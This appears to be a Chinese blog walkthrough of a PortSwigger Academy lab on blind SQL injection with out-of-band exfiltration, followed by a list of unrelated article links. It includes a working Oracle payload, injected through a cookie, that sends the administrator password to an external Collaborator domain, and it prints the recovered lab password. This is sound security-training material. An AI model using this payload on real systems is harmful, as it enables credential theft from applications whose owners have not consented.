当前位置: 首页 > news >正文

Lab17_ Blind SQL injection with out-of-band data exfiltration

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外数据泄露的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验,请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类,打开 burp 进行抓包

复制 Collaborator 中的链接

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包,成功响应

转到 Collaborator 模块,点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户

http://www.dtcms.com/a/56810.html

相关文章:

  • 【爬虫】开篇词
  • 通过Golang的container/list实现LRU缓存算法
  • 开源订货系统哪个好 三大订货系统源码推荐
  • C/C++蓝桥杯算法真题打卡(Day4)
  • Java @RequestBody注解
  • 30天入门Python(基础篇)——第16天:函数的作用域(局部变量、全局变量)
  • VB.NET 如何指定Microsoft Print To PDF的输出路径
  • PPT 小黑第6套
  • 从零开始了解Manus
  • TypeScript系列05-函数式编程与 TypeScript:打造类型安全的函数式架构
  • blender学习25.3.6
  • 群晖DS 223 Docker:开启私有云
  • OpenSSL 使用方法汇总:从证书管理到加密解密全解析
  • mapbox开发小技巧
  • 【简单的c程序设计精选题】
  • 《几何原本》命题I.22
  • 最大连续1的个数III --- 滑动窗口
  • VBA 数据库同一表的当前行与其他行的主键重复判断实现方案
  • Docker 安装 Nacos 2.1.1(单机版)
  • Ubuntu下MySQL的安装与使用(一)
  • 新手学习爬虫的案例
  • LLM时代的小模型思考:《What is the Role of Small Models in the LLM Era: A Survey》论文笔记
  • yolov7-3d算法原理
  • Git与GitHub:理解两者差异及其关系
  • 题海拾贝:P9241 [蓝桥杯 2023 省 B] 飞机降落
  • 初识脑机接口情绪识别
  • Express 中 get 参数获取
  • 51 单片机中断控制寄存器 TCON
  • Python爬虫:爬虫基础知识
  • 解决电脑问题(2)——主板问题